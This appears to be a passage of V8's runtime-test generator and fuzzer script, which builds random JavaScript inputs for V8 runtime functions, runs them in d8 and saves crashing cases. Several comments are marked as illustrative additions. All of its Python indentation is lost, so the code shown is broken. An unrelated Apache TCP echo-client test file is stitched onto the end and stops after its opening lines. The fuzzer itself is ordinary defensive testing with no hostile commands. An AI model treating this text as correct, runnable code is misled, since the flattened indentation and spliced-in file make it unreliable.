if die < 0.33:
result = self._String(raw_name, recursion_budget)
return result + self._Variable(name, "new String(%s)" % raw_name)
elif die < 0.66:
result = self._Boolean(raw_name, recursion_budget)
return result + self._Variable(name, "new Boolean(%s)" % raw_name)
else:
result = self._Number(raw_name, recursion_budget)
return result + self._Variable(name, "new Number(%s)" % raw_name)
def _RawRandomPropertyName(self):
if random.random() < 0.5:
return random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._RawRandomString(0, 10)
def _AddProperties(self, name, result, recursion_budget):
propcount = random.randint(0, 3)
propname = None
for i in range(propcount):
die = random.random()
if die < 0.5:
propname = "%s_prop%d" % (name, i)
result += self._Name(propname, recursion_budget - 1)
else:
propname = "\"%s\"" % self._RawRandomPropertyName()
propvalue_name = "%s_val%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch (e) {}" %
(name, propname, propvalue_name))
if random.random() < 0.2 and propname:
# Force the object to slow mode.
result.append("delete %s[%s];" % (name, propname))
def _RandomElementIndex(self, element_name, result):
if random.random() < 0.5:
return random.randint(-1000, 1000)
result += self._Smi(element_name, 0)
return element_name
def _AddElements(self, name, result, recursion_budget):
elementcount = random.randint(0, 3)
for i in range(elementcount):
element_name = "%s_idx%d" % (name, i)
index = self._RandomElementIndex(element_name, result)
value_name = "%s_elt%d" % (name, i)
result += self._Object(value_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch(e) {}" %
(name, index, value_name))
def _AddAccessors(self, name, result, recursion_budget):
accessorcount = random.randint(0, 3)
for i in range(accessorcount):
propname = self._RawRandomPropertyName()
what = random.choice(["get", "set"])
function_name = "%s_access%d" % (name, i)
result += self._PlainFunction(function_name, recursion_budget - 1)
result.append("try { Object.defineProperty(%s, \"%s\", {%s: %s}); } "
"catch (e) {}" % (name, propname, what, function_name))
def _PlainArray(self, name, recursion_budget):
die = random.random()
if die < 0.5:
literal = random.choice(["[]", "[1, 2]", "[1.5, 2.5]",
"['a', 'b', 1, true]"])
return self._Variable(name, literal)
else:
new = random.choice(["", "new "])
length = random.randint(0, 101000)
return self._Variable(name, "%sArray(%d)" % (new, length))
def _PlainObject(self, name, recursion_budget):
die = random.random()
if die < 0.67:
literal_propcount = random.randint(0, 3)
properties = []
result = []
for i in range(literal_propcount):
propname = self._RawRandomPropertyName()
propvalue_name = "%s_lit%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
properties.append("\"%s\": %s" % (propname, propvalue_name))
return result + self._Variable(name, "{%s}" % ", ".join(properties))
else:
return self._Variable(name, "new Object()")
def _JSArray(self, name, recursion_budget):
result = self._PlainArray(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _RawRandomBufferLength(self):
if random.random() < 0.2:
return random.choice([0, 1, 8, 0x40000000, 0x80000000])
return random.randint(0, 1000)
def _JSArrayBuffer(self, name, recursion_budget):
length = self._RawRandomBufferLength()
return self._Variable(name, "new ArrayBuffer(%d)" % length)
def _JSDataView(self, name, recursion_budget):
buffer_name = name + "_buffer"
result = self._JSArrayBuffer(buffer_name, recursion_budget)
args = [buffer_name]
die = random.random()
if die < 0.67:
offset = self._RawRandomBufferLength()
args.append("%d" % offset)
if die < 0.33:
length = self._RawRandomBufferLength()
args.append("%d" % length)
result += self._Variable(name, "new DataView(%s)" % ", ".join(args),
fallback="new DataView(new ArrayBuffer(8))")
return result
def _JSDate(self, name, recursion_budget):
die = random.random()
if die < 0.25:
return self._Variable(name, "new Date()")
elif die < 0.5:
ms_name = name + "_ms"
result = self._Number(ms_name, recursion_budget)
return result + self._Variable(name, "new Date(%s)" % ms_name)
elif die < 0.75:
str_name = name + "_str"
month = random.choice(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul",
"Aug", "Sep", "Oct", "Nov", "Dec"])
day = random.randint(1, 28)
year = random.randint(1900, 2100)
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
str_value = ("\"%s %s, %s %s:%s:%s\"" %
(month, day, year, hour, minute, second))
result = self._Variable(str_name, str_value)
return result + self._Variable(name, "new Date(%s)" % str_name)
else:
components = tuple(map(lambda x: "%s_%s" % (name, x),
["y", "m", "d", "h", "min", "s", "ms"]))
return ([j for i in map(self._Int32, components) for j in i] +
self._Variable(name, "new Date(%s)" % ", ".join(components)))
def _PlainFunction(self, name, recursion_budget):
result_name = "result"
body = ["function() {"]
body += self._Object(result_name, recursion_budget - 1)
body.append("return result;\n}")
return self._Variable(name, "%s" % "\n".join(body))
def _JSFunction(self, name, recursion_budget):
result = self._PlainFunction(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSFunctionProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.createFunction(%s, function() {})" %
self.PROXY_TRAPS)
def _JSGeneratorObject(self, name, recursion_budget):
# TODO(jkummerow): Be more creative here?
return self._Variable(name, "(function*() { yield 1; })()")
def _JSMap(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sMap()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
key_name = "%s_k%d" % (name, i)
value_name = "%s_v%d" % (name, i)
if weak:
result += self._JSObject(key_name, recursion_budget - 1)
else:
result += self._Object(key_name, recursion_budget - 1)
result += self._Object(value_name, recursion_budget - 1)
result.append("%s.set(%s, %s)" % (name, key_name, value_name))
return result
def _JSMapIterator(self, name, recursion_budget):
map_name = name + "_map"
result = self._JSMap(map_name, recursion_budget)
iterator_type = random.choice(['keys', 'values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(map_name, iterator_type)))
def _JSProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.create(%s)" % self.PROXY_TRAPS)
def _JSRegExp(self, name, recursion_budget):
flags = random.choice(["", "g", "i", "m", "gi"])
string = "a(b|c)*a" # TODO(jkummerow): Be more creative here?
ctor = random.choice(["/%s/%s", "new RegExp(\"%s\", \"%s\")"])
return self._Variable(name, ctor % (string, flags))
def _JSSet(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sSet()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
element_name = "%s_e%d" % (name, i)
if weak:
result += self._JSObject(element_name, recursion_budget - 1)
else:
result += self._Object(element_name, recursion_budget - 1)
result.append("%s.add(%s)" % (name, element_name))
return result
def _JSSetIterator(self, name, recursion_budget):
set_name = name + "_set"
result = self._JSSet(set_name, recursion_budget)
iterator_type = random.choice(['values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(set_name, iterator_type)))
def _JSTypedArray(self, name, recursion_budget):
arraytype = random.choice(["Int8", "Int16", "Int32", "Uint8", "Uint16",
"Uint32", "Float32", "Float64", "Uint8Clamped"])
ctor_type = random.randint(0, 3)
if ctor_type == 0:
length = random.randint(0, 1000)
return self._Variable(name, "new %sArray(%d)" % (arraytype, length),
fallback="new %sArray(8)" % arraytype)
elif ctor_type == 1:
input_name = name + "_typedarray"
result = self._JSTypedArray(input_name, recursion_budget - 1)
return (result +
self._Variable(name, "new %sArray(%s)" % (arraytype, input_name),
fallback="new %sArray(8)" % arraytype))
elif ctor_type == 2:
arraylike_name = name + "_arraylike"
result = self._JSObject(arraylike_name, recursion_budget - 1)
length = random.randint(0, 1000)
result.append("try { %s.length = %d; } catch(e) {}" %
(arraylike_name, length))
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, arraylike_name),
fallback="new %sArray(8)" % arraytype))
else:
die = random.random()
buffer_name = name + "_buffer"
args = [buffer_name]
result = self._JSArrayBuffer(buffer_name, recursion_budget)
if die < 0.67:
offset_name = name + "_offset"
args.append(offset_name)
result += self._Int32(offset_name)
if die < 0.33:
length_name = name + "_length"
args.append(length_name)
result += self._Int32(length_name)
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, ", ".join(args)),
fallback="new %sArray(8)" % arraytype))
def _JSArrayBufferView(self, name, recursion_budget):
if random.random() < 0.4:
return self._JSDataView(name, recursion_budget)
else:
return self._JSTypedArray(name, recursion_budget)
def _JSWeakCollection(self, name, recursion_budget):
ctor = random.choice([self._JSMap, self._JSSet])
return ctor(name, recursion_budget, weak="Weak")
def _PropertyDetails(self, name, recursion_budget):
# TODO(jkummerow): Be more clever here?
return self._Int32(name)
def _JSObject(self, name, recursion_budget):
die = random.random()
if die < 0.4:
function = random.choice([self._PlainObject, self._PlainArray,
self._PlainFunction])
elif die < 0.5:
return self._Variable(name, "this") # Global object.
else:
function = random.choice([self._JSArrayBuffer, self._JSDataView,
self._JSDate, self._JSFunctionProxy,
self._JSGeneratorObject, self._JSMap,
self._JSMapIterator, self._JSRegExp,
self._JSSet, self._JSSetIterator,
self._JSTypedArray, self._JSValue,
self._JSWeakCollection])
result = function(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSReceiver(self, name, recursion_budget):
if random.random() < 0.9: return self._JSObject(name, recursion_budget)
return self._JSProxy(name, recursion_budget)
def _HeapObject(self, name, recursion_budget):
die = random.random()
if die < 0.9: return self._JSReceiver(name, recursion_budget)
elif die < 0.95: return self._Oddball(name, recursion_budget)
else: return self._Name(name, recursion_budget)
def _Object(self, name, recursion_budget):
if recursion_budget <= 0:
function = random.choice([self._Oddball, self._Number, self._Name,
self._JSValue, self._JSRegExp])
return function(name, recursion_budget)
if random.random() < 0.2:
return self._Smi(name, recursion_budget)
return self._HeapObject(name, recursion_budget)
GENERATORS = {
"Boolean": ["true", _Boolean],
"HeapObject": ["new Object()", _HeapObject],
"Int32": ["32", _Int32],
"JSArray": ["new Array()", _JSArray],
"JSArrayBuffer": ["new ArrayBuffer(8)", _JSArrayBuffer],
"JSArrayBufferView": ["new Int32Array(2)", _JSArrayBufferView],
"JSDataView": ["new DataView(new ArrayBuffer(24))", _JSDataView],
"JSDate": ["new Date()", _JSDate],
"JSFunction": ["function() {}", _JSFunction],
"JSFunctionProxy": ["Proxy.createFunction({}, function() {})",
_JSFunctionProxy],
"JSGeneratorObject": ["(function*(){ yield 1; })()", _JSGeneratorObject],
"JSMap": ["new Map()", _JSMap],
"JSMapIterator": ["new Map().entries()", _JSMapIterator],
"JSObject": ["new Object()", _JSObject],
"JSProxy": ["Proxy.create({})", _JSProxy],
"JSReceiver": ["new Object()", _JSReceiver],
"JSRegExp": ["/ab/g", _JSRegExp],
"JSSet": ["new Set()", _JSSet],
"JSSetIterator": ["new Set().values()", _JSSetIterator],
"JSTypedArray": ["new Int32Array(2)", _JSTypedArray],
"JSValue": ["new String('foo')", _JSValue],
"JSWeakCollection": ["new WeakMap()", _JSWeakCollection],
"Name": ["\"name\"", _Name],
"Number": ["1.5", _Number],
"Object": ["new Object()", _Object],
"PropertyDetails": ["513", _PropertyDetails],
"SeqOneByteString": ["\"seq 1-byte\"", _SeqString],
"SeqString": ["\"seqstring\"", _SeqString],
"SeqTwoByteString": ["\"seq \\u2082-byte\"", _SeqTwoByteString],
"Smi": ["1", _Smi],
"StrictMode": ["1", _StrictMode],
"String": ["\"foo\"", _String],
"Symbol": ["Symbol(\"symbol\")", _Symbol],
"Uint32": ["32", _Uint32],
}
class ArgParser(object):
def __init__(self, regex, ctor):
self.regex = regex
self.ArgCtor = ctor
class Arg(object):
def __init__(self, typename, varname, index):
self.type = typename
self.name = "_%s" % varname
self.index = index
class Function(object):
def __init__(self, match):
self.name = match.group(1)
self.argslength = -1
self.args = {}
self.inline = ""
handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_HANDLE_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
plain_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
number_handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_NUMBER_ARG_HANDLE_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
smi_arg_parser = ArgParser(
re.compile("^\s*CONVERT_SMI_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Smi", match.group(1), int(match.group(2))))
double_arg_parser = ArgParser(
re.compile("^\s*CONVERT_DOUBLE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
number_arg_parser = ArgParser(
re.compile(
"^\s*CONVERT_NUMBER_CHECKED\(\w+, (\w+), (\w+), args\[(\d+)\]\)"),
lambda match: Arg(match.group(2), match.group(1), int(match.group(3))))
strict_mode_arg_parser = ArgParser(
re.compile("^\s*CONVERT_STRICT_MODE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("StrictMode", match.group(1), int(match.group(2))))
boolean_arg_parser = ArgParser(
re.compile("^\s*CONVERT_BOOLEAN_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Boolean", match.group(1), int(match.group(2))))
property_details_parser = ArgParser(
re.compile("^\s*CONVERT_PROPERTY_DETAILS_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("PropertyDetails", match.group(1), int(match.group(2))))
arg_parsers = [handle_arg_parser, plain_arg_parser, number_handle_arg_parser,
smi_arg_parser,
double_arg_parser, number_arg_parser, strict_mode_arg_parser,
boolean_arg_parser, property_details_parser]
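  # Illustrative note (not part of the original source): a runtime-function
  # body line such as
  #   CONVERT_ARG_HANDLE_CHECKED(JSArray, array, 0)
  # is matched by handle_arg_parser above and becomes an Arg with type
  # "JSArray", name "_array" and index 0, i.e. argument 0 of the runtime
  # function is expected to be a JSArray.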
def SetArgsLength(self, match):
self.argslength = int(match.group(1))
def TryParseArg(self, line):
for parser in Function.arg_parsers:
match = parser.regex.match(line)
if match:
arg = parser.ArgCtor(match)
self.args[arg.index] = arg
return True
return False
def Filename(self):
return "%s.js" % self.name.lower()
def __str__(self):
s = [self.name, "("]
argcount = self.argslength
if argcount < 0:
print("WARNING: unknown argslength for function %s" % self.name)
if self.args:
argcount = max([self.args[i].index + 1 for i in self.args])
else:
argcount = 0
for i in range(argcount):
if i > 0: s.append(", ")
s.append(self.args[i].type if i in self.args else "<unknown>")
s.append(")")
return "".join(s)
class Macro(object):
def __init__(self, match):
self.name = match.group(1)
self.args = [s.strip() for s in match.group(2).split(",")]
self.lines = []
self.indentation = 0
self.AddLine(match.group(3))
def AddLine(self, line):
if not line: return
if not self.lines:
# This is the first line, detect indentation.
self.indentation = len(line) - len(line.lstrip())
line = line.rstrip("\\\n ")
if not line: return
assert len(line[:self.indentation].strip()) == 0, \
("expected whitespace: '%s', full line: '%s'" %
(line[:self.indentation], line))
line = line[self.indentation:]
if not line: return
self.lines.append(line + "\n")
def Finalize(self):
for arg in self.args:
pattern = re.compile(r"(##|\b)%s(##|\b)" % arg)
for i in range(len(self.lines)):
self.lines[i] = re.sub(pattern, "%%(%s)s" % arg, self.lines[i])
def FillIn(self, arg_values):
filler = {}
assert len(arg_values) == len(self.args)
for i in range(len(self.args)):
filler[self.args[i]] = arg_values[i]
result = []
for line in self.lines:
result.append(line % filler)
return result
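# Illustrative note (not part of the original source): for a (hypothetical)
# macro captured as Macro(name="RETURN_IF", args=["x", "y"]) with the body
# line "if ((x) == (y)) return;", Finalize() rewrites the body to
# "if ((%(x)s) == (%(y)s)) return;" and FillIn(["a", "0"]) then expands it
# to "if ((a) == (0)) return;".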
# Parses HEADERFILENAME to find out which runtime functions are "inline".
def FindInlineRuntimeFunctions():
inline_functions = []
with open(HEADERFILENAME, "r") as f:
inline_list = "#define INLINE_FUNCTION_LIST(F) \\\n"
inline_function = re.compile(r"^\s*F\((\w+), \d+, \d+\)\s*\\?")
mode = "SEARCHING"
for line in f:
if mode == "ACTIVE":
match = inline_function.match(line)
if match:
inline_functions.append(match.group(1))
if not line.endswith("\\\n"):
mode = "SEARCHING"
elif mode == "SEARCHING":
if line == inline_list:
mode = "ACTIVE"
return inline_functions
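# Illustrative note (not part of the original source): inside the
# INLINE_FUNCTION_LIST block, a line such as
#   F(IsSmi, 1, 1) \
# is matched by the regex above and "IsSmi" is recorded as an inline
# runtime function, so its generated test calls %_IsSmi(...) instead of
# %IsSmi(...).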
def ReadFileAndExpandMacros(filename):
found_macros = {}
expanded_lines = []
with open(filename, "r") as f:
found_macro = None
for line in f:
if found_macro is not None:
found_macro.AddLine(line)
if not line.endswith("\\\n"):
found_macro.Finalize()
found_macro = None
continue
match = MACRO.match(line)
if match:
found_macro = Macro(match)
if found_macro.name in EXPAND_MACROS:
found_macros[found_macro.name] = found_macro
else:
found_macro = None
continue
match = FIRST_WORD.match(line)
if match:
first_word = match.group(1)
if first_word in found_macros:
MACRO_CALL = re.compile("%s\(([^)]*)\)" % first_word)
match = MACRO_CALL.match(line)
assert match
args = [s.strip() for s in match.group(1).split(",")]
expanded_lines += found_macros[first_word].FillIn(args)
continue
expanded_lines.append(line)
return expanded_lines
# Detects runtime functions by parsing FILENAME.
def FindRuntimeFunctions():
inline_functions = FindInlineRuntimeFunctions()
functions = []
expanded_lines = ReadFileAndExpandMacros(FILENAME)
function = None
partial_line = ""
for line in expanded_lines:
# Multi-line definition support, ignoring macros.
if line.startswith("RUNTIME_FUNCTION") and not line.endswith("{\n"):
if line.endswith("\\\n"): continue
partial_line = line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if partial_line.endswith("{"):
line = partial_line
partial_line = ""
else:
continue
match = FUNCTION.match(line)
if match:
function = Function(match)
if function.name in inline_functions:
function.inline = "_"
continue
if function is None: continue
match = ARGSLENGTH.match(line)
if match:
function.SetArgsLength(match)
continue
if function.TryParseArg(line):
continue
if line == FUNCTIONEND:
if function is not None:
functions.append(function)
function = None
return functions
# Hack: This must have the same fields as class Function above, because the
# two are used polymorphically in RunFuzzer(). We could use inheritance...
class Builtin(object):
def __init__(self, match):
self.name = match.group(1)
args = match.group(2)
self.argslength = 0 if args == "" else args.count(",") + 1
self.inline = ""
self.args = {}
if self.argslength > 0:
args = args.split(",")
for i in range(len(args)):
# a = args[i].strip() # TODO: filter out /* comments */ first.
a = ""
self.args[i] = Arg("Object", a, i)
def __str__(self):
return "%s(%d)" % (self.name, self.argslength)
def FindJSBuiltins():
PATH = "src"
fileslist = []
for (root, dirs, files) in os.walk(PATH):
for f in files:
if f.endswith(".js"):
fileslist.append(os.path.join(root, f))
builtins = []
regexp = re.compile("^function (\w+)\s*\((.*?)\) {")
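  # Illustrative note (not part of the original source): a builtin defined as
  #   function ArrayPush(arg) {
  # is matched with group(1) == "ArrayPush" and group(2) == "arg", so the
  # resulting Builtin has argslength == 1.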
matches = 0
for filename in fileslist:
with open(filename, "r") as f:
file_contents = f.read()
file_contents = js2c.ExpandInlineMacros(file_contents)
lines = file_contents.split("\n")
partial_line = ""
for line in lines:
if line.startswith("function") and not '{' in line:
partial_line += line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if '{' in line:
line = partial_line
partial_line = ""
else:
continue
match = regexp.match(line)
if match:
builtins.append(Builtin(match))
return builtins
# Classifies runtime functions.
def ClassifyFunctions(functions):
# Can be fuzzed with a JavaScript testcase.
js_fuzzable_functions = []
# We have enough information to fuzz these, but they need inputs that
# cannot be created or passed around in JavaScript.
cctest_fuzzable_functions = []
# This script does not have enough information about these.
unknown_functions = []
types = {}
for f in functions:
if f.name in BLACKLISTED:
continue
decision = js_fuzzable_functions
custom = CUSTOM_KNOWN_GOOD_INPUT.get(f.name, None)
if f.argslength < 0:
# Unknown length -> give up unless there's a custom definition.
if custom and custom[-1] is not None:
f.argslength = custom[-1]
assert len(custom) == f.argslength + 1, \
("%s: last custom definition must be argslength" % f.name)
else:
decision = unknown_functions
else:
if custom:
# Any custom definitions must match the known argslength.
assert len(custom) == f.argslength + 1, \
("%s should have %d custom definitions but has %d" %
(f.name, f.argslength + 1, len(custom)))
for i in range(f.argslength):
if custom and custom[i] is not None:
# All good, there's a custom definition.
pass
elif not i in f.args:
# No custom definition and no parse result -> give up.
decision = unknown_functions
else:
t = f.args[i].type
if t in NON_JS_TYPES:
decision = cctest_fuzzable_functions
else:
assert Generator.IsTypeSupported(t), \
("type generator not found for %s, function: %s" % (t, f))
decision.append(f)
return (js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions)
def _GetKnownGoodArgs(function, generator):
custom_input = CUSTOM_KNOWN_GOOD_INPUT.get(function.name, None)
definitions = []
argslist = []
for i in range(function.argslength):
if custom_input and custom_input[i] is not None:
name = "arg%d" % i
definitions.append("var %s = %s;" % (name, custom_input[i]))
else:
arg = function.args[i]
name = arg.name
definitions += generator.RandomVariable(name, arg.type, simple=True)
argslist.append(name)
return (definitions, argslist)
def _GenerateTestcase(function, definitions, argslist, throws):
s = ["// Copyright 2014 the V8 project authors. All rights reserved.",
"// AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY",
"// Flags: --allow-natives-syntax --harmony"] + definitions
call = "%%%s%s(%s);" % (function.inline, function.name, ", ".join(argslist))
if throws:
s.append("try {")
    s.append(call)
s.append("} catch(e) {}")
else:
s.append(call)
testcase = "\n".join(s)
return testcase
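# Illustrative note (not part of the original source): for a hypothetical
# runtime function "ArrayConcat" taking a single JSArray, the generated
# testcase would look roughly like (using the known-good literal from
# GENERATORS for the argument):
#   // Copyright 2014 the V8 project authors. All rights reserved.
#   // AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY
#   // Flags: --allow-natives-syntax --harmony
#   var _array = new Array();
#   %ArrayConcat(_array);
# with the call wrapped in try { ... } catch(e) {} when the function is
# listed in THROWS.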
def GenerateJSTestcaseForFunction(function):
gen = Generator()
(definitions, argslist) = _GetKnownGoodArgs(function, gen)
testcase = _GenerateTestcase(function, definitions, argslist,
function.name in THROWS)
path = os.path.join(BASEPATH, function.Filename())
with open(path, "w") as f:
f.write("%s\n" % testcase)
def GenerateTestcases(functions):
shutil.rmtree(BASEPATH) # Re-generate everything.
os.makedirs(BASEPATH)
for f in functions:
GenerateJSTestcaseForFunction(f)
def _SaveFileName(save_path, process_id, save_file_index):
return "%s/fuzz_%d_%d.js" % (save_path, process_id, save_file_index)
def _GetFuzzableRuntimeFunctions():
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
return js_fuzzable_functions
FUZZ_TARGET_LISTS = {
"runtime": _GetFuzzableRuntimeFunctions,
"builtins": FindJSBuiltins,
}
def RunFuzzer(process_id, options, stop_running):
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.001
SLEEP_TIME_FACTOR = 1.25
base_file_name = "/dev/shm/runtime_fuzz_%d" % process_id
test_file_name = "%s.js" % base_file_name
stderr_file_name = "%s.out" % base_file_name
save_file_index = 0
while os.path.exists(_SaveFileName(options.save_path, process_id,
save_file_index)):
save_file_index += 1
targets = FUZZ_TARGET_LISTS[options.fuzz_target]()
try:
for i in range(options.num_tests):
if stop_running.is_set(): break
function = None
while function is None or function.argslength == 0:
function = random.choice(targets)
args = []
definitions = []
gen = Generator()
for i in range(function.argslength):
arg = function.args[i]
argname = "arg%d%s" % (i, arg.name)
args.append(argname)
definitions += gen.RandomVariable(argname, arg.type, simple=False)
testcase = _GenerateTestcase(function, definitions, args, True)
with open(test_file_name, "w") as f:
f.write("%s\n" % testcase)
with open("/dev/null", "w") as devnull:
with open(stderr_file_name, "w") as stderr:
process = subprocess.Popen(
[options.binary, "--allow-natives-syntax", "--harmony",
"--enable-slow-asserts", test_file_name],
stdout=devnull, stderr=stderr)
end_time = time.time() + options.timeout
timed_out = False
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
os.kill(process.pid, signal.SIGTERM)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
if exit_code != 0 and not timed_out:
oom = False
with open(stderr_file_name, "r") as stderr:
for line in stderr:
if line.strip() == "# Allocation failed - process out of memory":
oom = True
break
if oom: continue
save_name = _SaveFileName(options.save_path, process_id,
save_file_index)
shutil.copyfile(test_file_name, save_name)
save_file_index += 1
except KeyboardInterrupt:
stop_running.set()
finally:
if os.path.exists(test_file_name):
os.remove(test_file_name)
if os.path.exists(stderr_file_name):
os.remove(stderr_file_name)
def BuildOptionParser():
usage = """Usage: %%prog [options] ACTION
where ACTION can be:
info Print diagnostic info.
check Check that runtime functions can be parsed as expected, and that
test cases exist.
generate Parse source code for runtime functions, and auto-generate
test cases for them. Warning: this will nuke and re-create
%(path)s.
fuzz Generate fuzz tests, run them, save those that crashed (see options).
""" % {"path": os.path.relpath(BASEPATH)}
o = optparse.OptionParser(usage=usage)
o.add_option("--binary", default="out/x64.debug/d8",
help="d8 binary used for running fuzz tests (default: %default)")
o.add_option("--fuzz-target", default="runtime",
help="Set of functions targeted by fuzzing. Allowed values: "
"%s (default: %%default)" % ", ".join(FUZZ_TARGET_LISTS))
o.add_option("-n", "--num-tests", default=1000, type="int",
help="Number of fuzz tests to generate per worker process"
" (default: %default)")
o.add_option("--save-path", default="~/runtime_fuzz_output",
help="Path to directory where failing tests will be stored"
" (default: %default)")
o.add_option("--timeout", default=20, type="int",
help="Timeout for each fuzz test (in seconds, default:"
"%default)")
return o
def ProcessOptions(options, args):
options.save_path = os.path.expanduser(options.save_path)
if options.fuzz_target not in FUZZ_TARGET_LISTS:
print("Invalid fuzz target: %s" % options.fuzz_target)
return False
if len(args) != 1 or args[0] == "help":
return False
return True
def Main():
parser = BuildOptionParser()
(options, args) = parser.parse_args()
if not ProcessOptions(options, args):
parser.print_help()
return 1
action = args[0]
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
builtins = FindJSBuiltins()
if action == "test":
print("put your temporary debugging code here")
return 0
if action == "info":
print("%d functions total; js_fuzzable_functions: %d, "
"cctest_fuzzable_functions: %d, unknown_functions: %d"
% (len(functions), len(js_fuzzable_functions),
len(cctest_fuzzable_functions), len(unknown_functions)))
print("%d JavaScript builtins" % len(builtins))
print("unknown functions:")
for f in unknown_functions:
print(f)
return 0
if action == "check":
errors = 0
def CheckCount(actual, expected, description):
if len(actual) != expected:
print("Expected to detect %d %s, but found %d." % (
expected, description, len(actual)))
print("If this change is intentional, please update the expectations"
" at the top of %s." % THIS_SCRIPT)
return 1
return 0
errors += CheckCount(functions, EXPECTED_FUNCTION_COUNT,
"functions in total")
errors += CheckCount(js_fuzzable_functions, EXPECTED_FUZZABLE_COUNT,
"JavaScript-fuzzable functions")
errors += CheckCount(cctest_fuzzable_functions, EXPECTED_CCTEST_COUNT,
"cctest-fuzzable functions")
errors += CheckCount(unknown_functions, EXPECTED_UNKNOWN_COUNT,
"functions with incomplete type information")
errors += CheckCount(builtins, EXPECTED_BUILTINS_COUNT,
"JavaScript builtins")
def CheckTestcasesExisting(functions):
errors = 0
for f in functions:
if not os.path.isfile(os.path.join(BASEPATH, f.Filename())):
print("Missing testcase for %s, please run '%s generate'" %
(f.name, THIS_SCRIPT))
errors += 1
      files = list(filter(lambda filename: not filename.startswith("."),
                          os.listdir(BASEPATH)))
if (len(files) != len(functions)):
unexpected_files = set(files) - set([f.Filename() for f in functions])
for f in unexpected_files:
print("Unexpected testcase: %s" % os.path.join(BASEPATH, f))
errors += 1
print("Run '%s generate' to automatically clean these up."
% THIS_SCRIPT)
return errors
errors += CheckTestcasesExisting(js_fuzzable_functions)
def CheckNameClashes(runtime_functions, builtins):
errors = 0
runtime_map = {}
for f in runtime_functions:
runtime_map[f.name] = 1
for b in builtins:
if b.name in runtime_map:
print("Builtin/Runtime_Function name clash: %s" % b.name)
errors += 1
return errors
errors += CheckNameClashes(functions, builtins)
if errors > 0:
return 1
print("Generated runtime tests: all good.")
return 0
if action == "generate":
GenerateTestcases(js_fuzzable_functions)
return 0
if action == "fuzz":
processes = []
if not os.path.isdir(options.save_path):
os.makedirs(options.save_path)
stop_running = multiprocessing.Event()
for i in range(multiprocessing.cpu_count()):
args = (i, options, stop_running)
p = multiprocessing.Process(target=RunFuzzer, args=args)
p.start()
processes.append(p)
try:
for i in range(len(processes)):
processes[i].join()
except KeyboardInterrupt:
stop_running.set()
for i in range(len(processes)):
processes[i].join()
return 0
if __name__ == "__main__":
sys.exit(Main())
|
TCP_echo_client.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import argparse
import selectors
import signal
import socket
import sys
from threading import Thread
import time
import traceback
from system_test import Logger
from system_test import TIMEOUT
class GracefulExitSignaler:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, signum, frame):
self.kill_now = True
def split_chunk_for_display(raw_bytes):
"""
